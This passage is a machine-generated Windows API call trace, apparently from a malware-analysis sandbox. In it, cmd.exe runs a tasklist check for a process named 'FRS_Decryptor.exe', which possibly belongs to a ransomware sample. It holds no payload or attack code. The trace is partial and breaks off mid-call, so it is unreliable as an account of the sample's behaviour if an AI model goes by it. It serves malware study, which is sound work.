(LangId=0x0) returned 0x409 [0127.556] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.556] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ff76c | out: phkResult=0x4ff76c*=0x0) returned 0x2 [0127.556] VirtualQuery (in: lpAddress=0x4ff77b, lpBuffer=0x4ff714, dwLength=0x1c | out: lpBuffer=0x4ff714*(BaseAddress=0x4ff000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.556] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x4ff714, dwLength=0x1c | out: lpBuffer=0x4ff714*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.556] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x4ff714, dwLength=0x1c | out: lpBuffer=0x4ff714*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.556] VirtualQuery (in: lpAddress=0x403000, lpBuffer=0x4ff714, dwLength=0x1c | out: lpBuffer=0x4ff714*(BaseAddress=0x403000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.556] VirtualQuery (in: lpAddress=0x500000, lpBuffer=0x4ff714, dwLength=0x1c | out: lpBuffer=0x4ff714*(BaseAddress=0x500000, AllocationBase=0x500000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0127.556] GetConsoleOutputCP () returned 0x1b5 [0127.556] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0127.556] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0127.556] _get_osfhandle (_FileHandle=1) returned 0x260 [0127.556] SetConsoleMode (hConsoleHandle=0x260, dwMode=0x0) returned 0 [0127.556] _get_osfhandle (_FileHandle=1) returned 0x260 [0127.556] GetConsoleMode (in: hConsoleHandle=0x260, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0127.556] _get_osfhandle (_FileHandle=0) returned 0x24 [0127.556] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0127.557] GetEnvironmentStringsW () returned 0x6340c0* [0127.557] FreeEnvironmentStringsA (penv="=") returned 1 [0127.557] GetEnvironmentStringsW () returned 0x6340c0* [0127.557] FreeEnvironmentStringsA (penv="=") returned 1 [0127.557] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4fe6bc | out: phkResult=0x4fe6bc*=0x44) returned 0x0 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x0, lpData=0x4fe6c8*=0xb2, lpcbData=0x4fe6c0*=0x1000) returned 0x2 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x4, lpData=0x4fe6c8*=0x1, lpcbData=0x4fe6c0*=0x4) returned 0x0 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x0, lpData=0x4fe6c8*=0x1, lpcbData=0x4fe6c0*=0x1000) returned 0x2 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x4, lpData=0x4fe6c8*=0x0, lpcbData=0x4fe6c0*=0x4) returned 0x0 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x4, lpData=0x4fe6c8*=0x40, lpcbData=0x4fe6c0*=0x4) returned 0x0 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x4, lpData=0x4fe6c8*=0x40, lpcbData=0x4fe6c0*=0x4) returned 0x0 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x0, lpData=0x4fe6c8*=0x40, lpcbData=0x4fe6c0*=0x1000) returned 0x2 [0127.557] RegCloseKey (hKey=0x44) returned 0x0 [0127.557] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4fe6bc | out: phkResult=0x4fe6bc*=0x44) returned 0x0 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x0, lpData=0x4fe6c8*=0x40, lpcbData=0x4fe6c0*=0x1000) returned 0x2 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x4, lpData=0x4fe6c8*=0x1, lpcbData=0x4fe6c0*=0x4) returned 0x0 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x0, lpData=0x4fe6c8*=0x1, lpcbData=0x4fe6c0*=0x1000) returned 0x2 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x4, lpData=0x4fe6c8*=0x0, lpcbData=0x4fe6c0*=0x4) returned 0x0 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x4, lpData=0x4fe6c8*=0x9, lpcbData=0x4fe6c0*=0x4) returned 0x0 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x4, lpData=0x4fe6c8*=0x9, lpcbData=0x4fe6c0*=0x4) returned 0x0 [0127.557] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4fe6c4, lpData=0x4fe6c8, lpcbData=0x4fe6c0*=0x1000 | out: lpType=0x4fe6c4*=0x0, lpData=0x4fe6c8*=0x9, lpcbData=0x4fe6c0*=0x1000) returned 0x2 [0127.557] RegCloseKey (hKey=0x44) returned 0x0 [0127.557] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500aa [0127.557] srand (_Seed=0x5aa500aa) [0127.557] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0127.557] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0127.558] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0127.558] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6340c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0127.558] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.558] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.558] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0127.558] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.558] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.558] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.558] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.558] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.558] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.558] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.558] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.558] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.558] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.558] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ff49c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0127.558] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x4ff49c, lpFilePart=0x4ff498 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x4ff498*="Desktop") returned 0x1c [0127.558] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0127.558] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4ff218 | out: lpFindFileData=0x4ff218) returned 0x6342d8 [0127.559] FindClose (in: hFindFile=0x6342d8 | out: hFindFile=0x6342d8) returned 1 [0127.559] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x4ff218 | out: lpFindFileData=0x4ff218) returned 0x6342d8 [0127.559] FindClose (in: hFindFile=0x6342d8 | out: hFindFile=0x6342d8) returned 1 [0127.559] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0127.559] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x4ff218 | out: lpFindFileData=0x4ff218) returned 0x6342d8 [0127.559] FindClose (in: hFindFile=0x6342d8 | out: hFindFile=0x6342d8) returned 1 [0127.559] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0127.559] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0127.559] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0127.559] GetEnvironmentStringsW () returned 0x636190* [0127.559] FreeEnvironmentStringsA (penv="=") returned 1 [0127.559] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0127.560] GetConsoleOutputCP () returned 0x1b5 [0127.560] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0127.560] GetUserDefaultLCID () returned 0x409 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4ff5c8, cchData=128 | out: lpLCData="0") returned 2 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4ff5c8, cchData=128 | out: lpLCData="0") returned 2 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4ff5c8, cchData=128 | out: lpLCData="1") returned 2 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0127.560] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0127.560] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.561] GetConsoleTitleW (in: lpConsoleTitle=0x634e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0127.562] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0127.562] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0127.562] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0127.562] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0127.562] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0127.562] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0127.562] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0127.562] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0127.562] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0127.562] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0127.562] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0127.563] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0127.563] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0127.563] _wcsicmp (_String1="IF", _String2="find") returned 3 [0127.563] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0127.563] _wcsicmp (_String1="REM", _String2="find") returned 12 [0127.563] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0127.564] _pipe (in: _PtHandles=0x6351f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x6351f0) returned 0 [0127.564] _dup (_FileHandle=1) returned 5 [0127.564] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0127.564] _close (_FileHandle=4) returned 0 [0127.564] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0127.564] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0127.564] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0127.564] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0127.564] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0127.564] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0127.564] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0127.564] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0127.564] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0127.565] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0127.565] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0127.565] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0127.565] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0127.565] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0127.565] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0127.565] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0127.565] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0127.565] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0127.565] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0127.565] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0127.565] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0127.565] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0127.565] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0127.565] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0127.565] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0127.565] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0127.565] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0127.565] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0127.565] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0127.565] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0127.565] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0127.565] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0127.565] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0127.565] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0127.565] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0127.565] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0127.565] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0127.565] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0127.565] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0127.565] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0127.565] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0127.565] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0127.565] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0127.565] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0127.565] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0127.565] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0127.565] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0127.565] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0127.565] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0127.565] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0127.565] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0127.565] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0127.565] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0127.565] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0127.565] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0127.565] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0127.565] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0127.565] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0127.565] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0127.565] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0127.565] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0127.565] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0127.565] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0127.566] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0127.566] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0127.566] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0127.566] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0127.566] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0127.566] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0127.566] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0127.566] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0127.566] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0127.566] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0127.566] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0127.566] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0127.566] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0127.566] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0127.566] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0127.566] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0127.566] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0127.566] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0127.566] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0127.566] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0127.566] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0127.566] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0127.566] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0127.566] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0127.566] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0127.566] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0127.566] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0127.566] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0127.566] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0127.566] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0127.566] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0127.566] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0127.566] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0127.566] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0127.566] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0127.566] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0127.566] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0127.567] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0127.567] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0127.567] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0127.567] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0127.567] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0127.567] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0127.567] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0127.567] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0127.567] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0127.567] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0127.567] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0127.567] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0127.567] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0127.567] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0127.567] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0127.567] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0127.567] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0127.567] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0127.567] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0127.567] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0127.567] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0127.567] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0127.567] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0127.567] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0127.567] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0127.567] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0127.567] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0127.567] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0127.567] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0127.567] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0127.567] SetErrorMode (uMode=0x0) returned 0x0 [0127.568] SetErrorMode (uMode=0x1) returned 0x0 [0127.568] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x635228, lpFilePart=0x4ff424 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x4ff424*="Desktop") returned 0x1c [0127.568] SetErrorMode (uMode=0x0) returned 0x1 [0127.568] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.568] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.572] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.573] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x4ff1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff1b0) returned 0xffffffff [0127.573] GetLastError () returned 0x2 [0127.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.573] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x4ff1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff1b0) returned 0x635530 [0127.573] FindClose (in: hFindFile=0x635530 | out: hFindFile=0x635530) returned 1 [0127.573] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x4ff1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff1b0) returned 0xffffffff [0127.573] GetLastError () returned 0x2 [0127.573] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x4ff1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff1b0) returned 0x635530 [0127.573] FindClose (in: hFindFile=0x635530 | out: hFindFile=0x635530) returned 1 [0127.573] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.573] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.574] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0127.574] SetErrorMode (uMode=0x0) returned 0x0 [0127.574] SetErrorMode (uMode=0x1) returned 0x0 [0127.574] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x63a3c0, lpFilePart=0x4ff1cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x4ff1cc*="Desktop") returned 0x1c [0127.574] SetErrorMode (uMode=0x0) returned 0x1 [0127.574] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: 